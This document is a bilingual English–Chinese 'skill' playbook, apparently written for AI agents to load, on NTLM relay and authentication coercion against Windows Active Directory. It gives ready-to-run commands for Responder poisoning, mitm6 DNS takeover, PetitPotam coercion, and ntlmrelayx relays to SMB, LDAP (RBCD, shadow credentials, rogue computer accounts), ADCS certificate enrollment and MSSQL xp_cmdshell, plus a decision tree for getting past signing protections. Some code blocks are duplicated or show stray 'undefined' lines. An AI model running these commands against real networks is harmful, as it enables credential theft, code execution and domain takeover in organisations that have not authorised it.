ntlm-relay-coercion

Compare original and translation side by side

🇺🇸

Original

English

🇨🇳

Translation

Chinese

SKILL: NTLM Relay and Authentication Coercion — Expert Attack Playbook

SKILL: NTLM Relay and Authentication Coercion — 专家级攻击操作手册

AI LOAD INSTRUCTION: Expert NTLM relay and coercion techniques. Covers relay to SMB/LDAP/HTTP/MSSQL, signing requirements, Responder poisoning, mitm6, cross-protocol relay, WebDAV coercion, and all major coercion methods. Base models miss signing/EPA requirements and cross-protocol relay constraints.

AI加载说明：专家级NTLM中继与胁迫技术，涵盖向SMB/LDAP/HTTP/MSSQL的中继、签名要求、Responder投毒、mitm6、跨协议中继、WebDAV胁迫以及所有主流胁迫方法。基础模型会遗漏签名/EPA要求和跨协议中继约束。

0. RELATED ROUTING

0. 相关路径

Before going deep, consider loading:

active-directory-certificate-services for ESC8 (relay to ADCS enrollment)
active-directory-acl-abuse for ACL modification via LDAP relay (RBCD, shadow creds)
active-directory-kerberos-attacks for Kerberos attacks after relay success
windows-lateral-movement for post-relay lateral movement

深入学习前，可考虑加载以下内容：

active-directory-certificate-services 用于ESC8（中继到ADCS证书注册）
active-directory-acl-abuse 用于通过LDAP中继修改ACL（RBCD、影子凭据）
active-directory-kerberos-attacks 用于中继成功后的Kerberos攻击
windows-lateral-movement 用于中继后的横向移动

Advanced Reference

高级参考

Also load COERCION_METHODS.md when you need:

Detailed coercion method comparison (PetitPotam, PrinterBug, DFSCoerce, etc.)
RPC function-level details and prerequisites
Coercer tool usage and discovery

如需以下内容，也可加载COERCION_METHODS.md：

详细的胁迫方法对比（PetitPotam、PrinterBug、DFSCoerce等）
RPC函数级详情和前置要求
Coercer工具使用与发现

1. NTLM RELAY FUNDAMENTALS

1. NTLM中继基础

Victim          Attacker (relay)         Target
  │                 │                      │
  │── NTLM Auth ──→│                      │  (1) Victim authenticates (coerced/poisoned)
  │                 │── Forward Auth ─────→│  (2) Attacker relays to target
  │                 │←─ Challenge ──────── │  (3) Target sends challenge
  │←─ Challenge ────│                      │  (4) Attacker forwards challenge to victim
  │── Response ────→│                      │  (5) Victim computes response
  │                 │── Forward Response ─→│  (6) Attacker relays response to target
  │                 │←─ Authenticated! ────│  (7) Target accepts → attacker has session

Victim          Attacker (relay)         Target
  │                 │                      │
  │── NTLM Auth ──→│                      │  (1) Victim authenticates (coerced/poisoned)
  │                 │── Forward Auth ─────→│  (2) Attacker relays to target
  │                 │←─ Challenge ──────── │  (3) Target sends challenge
  │←─ Challenge ────│                      │  (4) Attacker forwards challenge to victim
  │── Response ────→│                      │  (5) Victim computes response
  │                 │── Forward Response ─→│  (6) Attacker relays response to target
  │                 │←─ Authenticated! ────│  (7) Target accepts → attacker has session

NTLMv1 vs NTLMv2

Feature	NTLMv1	NTLMv2
Security	Weak (crackable to NTLM hash)	Stronger (but still relayable)
Relay	Yes	Yes
Crack to hash	Yes (rainbow tables, crack.sh)	Offline brute-force only
Downgrade	Force via Responder `--lm`	Default in modern Windows

特性	NTLMv1	NTLMv2
安全性	弱（可破解得到NTLM哈希）	更强（但仍可被中继）
可中继	是	是
破解获取哈希	是（彩虹表、crack.sh）	仅支持离线暴力破解
降级	可通过Responder `--lm` 参数强制降级	现代Windows系统默认使用

2. RELAY TARGET MATRIX

2. 中继目标矩阵

Target Protocol	What You Get	Signing Required by Default?	EPA/Channel Binding?
SMB	Command exec (if admin), file access	DCs: Yes, Workstations: No	No
LDAP	ACL modification, RBCD, shadow creds, add computer	DCs: No (negotiated)	No (unless configured)
LDAPS	Same as LDAP but encrypted	N/A	Yes (channel binding)
HTTP (ADCS)	Certificate enrollment (ESC8)	No	Depends on config
MSSQL	SQL queries, xp_cmdshell	No	No
IMAP/SMTP	Email access	No	No
RPC	Various (CA enrollment for ESC11)	Depends	No

目标协议	可获得权限	默认是否要求签名？	是否开启EPA/通道绑定？
SMB	命令执行（若为管理员权限）、文件访问	域控制器：是, 工作站：否	否
LDAP	ACL修改、RBCD、影子凭据、添加计算机	域控制器：否（协商决定）	否（除非手动配置）
LDAPS	与LDAP相同但传输加密	不适用	是（通道绑定）
HTTP (ADCS)	证书注册（ESC8）	否	取决于配置
MSSQL	SQL查询、xp_cmdshell执行	否	否
IMAP/SMTP	邮件访问权限	否	否
RPC	多种权限（ESC11场景的CA注册）	取决于配置	否

Signing Check

签名检查

bash

undefined

bash

undefined

Check SMB signing on target

检查目标的SMB签名状态

crackmapexec smb TARGET_IP --gen-relay-list relay_targets.txt

Outputs hosts WITHOUT required SMB signing

输出未强制要求SMB签名的主机

Nmap SMB signing check

Nmap SMB签名检查

nmap -p 445 --script smb2-security-mode TARGET_RANGE

---

nmap -p 445 --script smb2-security-mode TARGET_RANGE

---

3. RESPONDER — CREDENTIAL CAPTURE

3. Responder — 凭证捕获

LLMNR/NBT-NS/WPAD/mDNS Poisoning

LLMNR/NBT-NS/WPAD/mDNS投毒

bash

undefined

bash

undefined

Start Responder (capture mode — don't relay, just capture hashes)

启动Responder（捕获模式 —— 不中继，仅捕获哈希）

responder -I eth0 -dwP

Analyze mode (passive, no poisoning)

分析模式（被动模式，不发起投毒）

responder -I eth0 -A

Key protocols poisoned:

主要投毒的协议:

LLMNR (UDP 5355) — Link-Local Multicast Name Resolution

LLMNR (UDP 5355) — 链路本地多播名称解析

NBT-NS (UDP 137) — NetBIOS Name Service

NBT-NS (UDP 137) — NetBIOS名称服务

WPAD — Web Proxy Auto-Discovery (proxy config)

WPAD — Web代理自动发现（代理配置）

mDNS (UDP 5353) — Multicast DNS

mDNS (UDP 5353) — 多播DNS

undefined

undefined

Responder + Relay (Don't Capture, Relay Instead)

Responder + 中继（不捕获，直接中继）

bash

undefined

bash

undefined

Disable HTTP and SMB servers in Responder (ntlmrelayx will handle them)

在Responder中禁用HTTP和SMB服务器（将由ntlmrelayx处理）

Edit /etc/responder/Responder.conf: set HTTP and SMB to Off

编辑 /etc/responder/Responder.conf: 将HTTP和SMB设置为Off

Start Responder for poisoning only

仅启动Responder执行投毒

responder -I eth0 -dwP

Start ntlmrelayx for relay

启动ntlmrelayx执行中继

ntlmrelayx.py -tf targets.txt -smb2support

---

ntlmrelayx.py -tf targets.txt -smb2support

---

4. NTLMRELAYX — RELAY EXECUTION

4. NTLMRELAYX — 中继执行

Relay to SMB (Admin Execution)

中继到SMB（管理员权限执行）

bash

undefined

bash

undefined

Execute command on targets (requires admin privs on target)

在目标上执行命令（需要目标的管理员权限）

ntlmrelayx.py -tf targets.txt -smb2support -c "whoami"

Dump SAM hashes

导出SAM哈希

ntlmrelayx.py -tf targets.txt -smb2support

Interactive SOCKS proxy (maintain sessions)

交互式SOCKS代理（维持会话）

ntlmrelayx.py -tf targets.txt -smb2support -socks

Then: proxychains smbclient //TARGET/C$ -U DOMAIN/user

后续使用: proxychains smbclient //TARGET/C$ -U DOMAIN/user

undefined

undefined

Relay to LDAP (ACL Modification)

中继到LDAP（ACL修改）

bash

undefined

bash

undefined

Automatic RBCD (delegate-access)

自动配置RBCD（委派访问权限）

ntlmrelayx.py -t ldap://DC_IP --delegate-access -smb2support

Escalate via shadow credentials

通过影子凭据提权

ntlmrelayx.py -t ldap://DC_IP --shadow-credentials -smb2support

Add computer account

添加计算机账户

ntlmrelayx.py -t ldap://DC_IP --add-computer FAKE01 P@ss123 -smb2support

Dump domain info

导出域信息

ntlmrelayx.py -t ldap://DC_IP -smb2support --dump-domain

undefined

ntlmrelayx.py -t ldap://DC_IP -smb2support --dump-domain

undefined

Relay to ADCS HTTP (ESC8)

中继到ADCS HTTP（ESC8）

bash

ntlmrelayx.py -t http://CA_HOST/certsrv/certfnsh.asp -smb2support \
  --adcs --template DomainController

bash

ntlmrelayx.py -t http://CA_HOST/certsrv/certfnsh.asp -smb2support \
  --adcs --template DomainController

Use with coercion to relay DC auth → get DC certificate

结合胁迫中继域控制器认证 → 获取域控制器证书

undefined

undefined

Relay to MSSQL

中继到MSSQL

bash

ntlmrelayx.py -t mssql://SQL_HOST -smb2support -q "SELECT system_user; EXEC xp_cmdshell 'whoami'"

bash

ntlmrelayx.py -t mssql://SQL_HOST -smb2support -q "SELECT system_user; EXEC xp_cmdshell 'whoami'"

5. MITM6 — IPv6 DNS TAKEOVER

5. MITM6 — IPv6 DNS劫持

bash

undefined

bash

undefined

mitm6 exploits IPv6 auto-configuration to become DNS server

mitm6利用IPv6自动配置机制成为DNS服务器

mitm6 -d domain.com

Combined with ntlmrelayx

结合ntlmrelayx使用

ntlmrelayx.py -6 -t ldap://DC_IP -wh fake-wpad.domain.com --delegate-access -smb2support

Flow:

流程:

1. mitm6 sends DHCPv6 replies → victim gets attacker as IPv6 DNS

1. mitm6发送DHCPv6回复 → 受害者将攻击者设为IPv6 DNS服务器

2. Victim queries WPAD → attacker responds

2. 受害者查询WPAD → 攻击者返回伪造响应

3. NTLM auth triggered → relayed to LDAP

3. 触发NTLM认证 → 中继到LDAP

4. RBCD or shadow credentials set on victim computer

4. 在受害者计算机上配置RBCD或影子凭据

---

---

6. CROSS-PROTOCOL RELAY

6. 跨协议中继

SMB → LDAP

Capture SMB authentication, relay to LDAP (requires no LDAP signing enforcement).

bash

undefined

捕获SMB认证，中继到LDAP（需要未强制开启LDAP签名）。

bash

undefined

Coerce SMB auth from DC, relay to LDAP on same or different DC

胁迫域控制器发起SMB认证，中继到同一或其他域控制器的LDAP服务

ntlmrelayx.py -t ldap://DC02_IP --delegate-access -smb2support

Trigger coercion (attacker receives SMB auth)

触发胁迫（攻击者接收SMB认证）

PetitPotam.py ATTACKER_IP DC01_IP


**Limitation**: SMB → LDAP relay fails if the source uses SMB signing negotiation that indicates relay.

PetitPotam.py ATTACKER_IP DC01_IP


**限制**: 如果源端使用表明存在中继的SMB签名协商，SMB→LDAP中继会失败。

WebDAV → LDAP

WebDAV from workstations sends NTLM over HTTP → relay to LDAP (no signing issues).

bash

undefined

工作站的WebDAV会通过HTTP发送NTLM → 中继到LDAP（无签名问题）。

bash

undefined

WebDAV coercion sends HTTP-based NTLM (no SMB signing concern)

WebDAV胁迫发送基于HTTP的NTLM（无SMB签名限制问题）

ntlmrelayx.py -t ldap://DC_IP --delegate-access -smb2support

Coerce via WebDAV (workstation must have WebClient service running)

通过WebDAV发起胁迫（工作站必须运行WebClient服务）

Use @ATTACKER_PORT format to force WebDAV

使用@ATTACKER_PORT格式强制走WebDAV协议

PetitPotam.py ATTACKER@80/test WORKSTATION_IP

---

PetitPotam.py ATTACKER@80/test WORKSTATION_IP

---

7. WEBDAV-BASED COERCION

7. 基于WebDAV的胁迫

WebClient service (WebDAV) converts SMB-type coercion to HTTP-based NTLM.

bash

undefined

WebClient服务（WebDAV）将SMB类型的胁迫转换为基于HTTP的NTLM。

bash

undefined

Check if WebClient is running (port 80 listener or service query)

检查WebClient是否运行（80端口监听或服务查询）

crackmapexec smb TARGET -u user -p pass -M webdav

Start WebDAV coercion (from workstation, not server)

启动WebDAV胁迫（从工作站发起，而非服务器）

Force target to authenticate via HTTP:

强制目标通过HTTP进行认证:

Use UNC path format: \ATTACKER@PORT\share

使用UNC路径格式: \ATTACKER@PORT\share


**Key advantage**: HTTP-based NTLM avoids SMB signing requirements.

---


**核心优势**: 基于HTTP的NTLM不受SMB签名要求限制。

---

8. NTLM RELAY DECISION TREE

8. NTLM中继决策树

Want to relay NTLM authentication
│
├── What auth can you capture?
│   ├── Responder poisoning (passive, wait for queries)
│   ├── mitm6 (DHCPv6 DNS takeover, periodic)
│   └── Active coercion → load COERCION_METHODS.md
│
├── What target to relay to?
│   │
│   ├── Need code execution?
│   │   ├── SMB target without signing → ntlmrelayx to SMB (§4)
│   │   └── MSSQL target → ntlmrelayx to MSSQL + xp_cmdshell (§4)
│   │
│   ├── Need domain escalation?
│   │   ├── LDAP signing not enforced?
│   │   │   ├── Relay to LDAP → RBCD (§4)
│   │   │   ├── Relay to LDAP → shadow credentials (§4)
│   │   │   └── Relay to LDAP → add computer + delegate (§4)
│   │   └── LDAP signing enforced?
│   │       └── Relay to ADCS HTTP (ESC8) → certificate (§4)
│   │
│   └── Need certificate?
│       └── Relay to ADCS HTTP/RPC → ESC8/ESC11 (§4)
│
├── Source is SMB-based?
│   ├── Target is SMB → check signing (§2)
│   ├── Target is LDAP → may work (cross-protocol, §6)
│   └── Target is HTTP → works (cross-protocol)
│
├── Source is HTTP-based (WebDAV)?
│   └── Relay to any target (no signing issues, §6/§7)
│
└── Relay fails?
    ├── Check signing requirements (§2)
    ├── Check EPA/channel binding
    ├── Try cross-protocol (SMB → LDAP)
    └── Try WebDAV coercion (avoids SMB signing)

想要中继NTLM认证
│
├── 你能捕获哪种认证？
│   ├── Responder投毒（被动，等待查询）
│   ├── mitm6（DHCPv6 DNS劫持，周期性触发）
│   └── 主动胁迫 → 加载COERCION_METHODS.md
│
├── 要中继到什么目标？
│   │
│   ├── 需要代码执行？
│   │   ├── 未开启签名的SMB目标 → 用ntlmrelayx中继到SMB（第4节）
│   │   └── MSSQL目标 → 用ntlmrelayx中继到MSSQL + xp_cmdshell（第4节）
│   │
│   ├── 需要域内提权？
│   │   ├── 未强制开启LDAP签名？
│   │   │   ├── 中继到LDAP → RBCD（第4节）
│   │   │   ├── 中继到LDAP → 影子凭据（第4节）
│   │   │   └── 中继到LDAP → 添加计算机 + 委派（第4节）
│   │   └── 已强制开启LDAP签名？
│   │       └── 中继到ADCS HTTP（ESC8） → 获得证书（第4节）
│   │
│   └── 需要证书？
│       └── 中继到ADCS HTTP/RPC → ESC8/ESC11（第4节）
│
├── 源是基于SMB的？
│   ├── 目标是SMB → 检查签名（第2节）
│   ├── 目标是LDAP → 可能可行（跨协议，第6节）
│   └── 目标是HTTP → 可行（跨协议）
│
├── 源是基于HTTP的（WebDAV）？
│   └── 可中继到任意目标（无签名问题，第6/7节）
│
└── 中继失败？
    ├── 检查签名要求（第2节）
    ├── 检查EPA/通道绑定
    ├── 尝试跨协议（SMB → LDAP）
    └── 尝试WebDAV胁迫（避开SMB签名限制）